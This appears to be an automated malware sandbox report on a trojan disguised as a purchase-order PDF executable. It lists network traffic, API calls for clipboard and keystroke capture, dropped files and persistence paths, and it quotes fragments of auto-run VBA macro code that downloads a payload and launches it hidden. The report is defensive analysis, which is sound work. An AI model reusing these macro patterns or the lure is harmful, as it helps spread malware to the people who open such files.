                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49741 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49760 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49774 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49799 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49800 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49820 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49821 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49881 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49905 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49917 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49943 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49968 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49967 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50001 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50004 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50021 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50031 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50033 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50058 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:50061 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:50062 version: TLS 1.2
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,9_2_00EA7099
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00EA7294
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,9_2_00EA7099
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E94342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,9_2_00E94342
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EBF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_00EBF5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: NEnoihuS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NEBFQQYWPS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: NEnoihuS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NEBFQQYWPS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: NEnoihuS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NEBFQQYWPS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E970AE: CreateFileW,DeviceIoControl,CloseHandle,9_2_00E970AE
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,9_2_00E8B9F1
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E982D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_00E982D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E5DCD09_2_00E5DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E5A0C09_2_00E5A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E701839_2_00E70183
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9220C9_2_00E9220C
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E585309_2_00E58530
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E706779_2_00E70677
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E566709_2_00E56670
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E887799_2_00E88779
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E708C99_2_00E708C9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EBA8DC9_2_00EBA8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E70A8F9_2_00E70A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E56BBC9_2_00E56BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E62B409_2_00E62B40
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E58CA09_2_00E58CA0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E7AC839_2_00E7AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6AD5C9_2_00E6AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E70EC49_2_00E70EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E84EBF9_2_00E84EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB30AD9_2_00EB30AD
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8113E9_2_00E8113E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E712F99_2_00E712F9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8542F9_2_00E8542F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EBF5D09_2_00EBF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E636809_2_00E63680
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8599F9_2_00E8599F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E7DA749_2_00E7DA74
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E7BDF69_2_00E7BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E5BDF09_2_00E5BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E55D329_2_00E55D32
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E71E5A9_2_00E71E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E87FFD9_2_00E87FFD
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9BFB89_2_00E9BFB8
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E7DF699_2_00E7DF69
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NEnoihuS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NEBFQQYWPS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX6FCE.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 00E77750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 00E6F885 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX6FCE.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2139101361.0000000000616000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161642884.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName!l vs New PO - Supplier 16-12-2024-Pdf.exe
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@21/50@9/4
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9D712 GetLastError,FormatMessageW,9_2_00E9D712
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8B8B0 AdjustTokenPrivileges,CloseHandle,9_2_00E8B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00E8BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,9_2_00E9EA85
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,9_2_00E96F5B
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EAC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,9_2_00EAC604
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E531F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,9_2_00E531F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4508
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\BBLXFG.vbsJump to behavior
                              Source: Yara matchFile source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
